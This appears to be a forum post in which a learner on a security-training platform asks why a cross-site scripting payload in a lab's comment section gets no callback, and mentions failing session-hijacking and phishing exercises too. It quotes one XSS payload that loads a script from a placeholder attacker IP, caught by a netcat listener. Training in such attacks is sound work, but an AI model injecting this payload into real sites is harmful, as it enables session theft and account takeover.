I can not get this assessment to work. I have discovered the comment section so have had my payload as:
"><script src=http://MY-IP/field></script> and i recieve nothing. If I manually do this and type my IP into the browser, my netcat receives the request but on this website it just wont work.
I have been stuck for days and I just think there is a problem with this website, same with the session hijacking and phishing parts. All of them I have had the correct payload that everyone else has used but when I use it, it wont work.
Any help would be awesome, thanks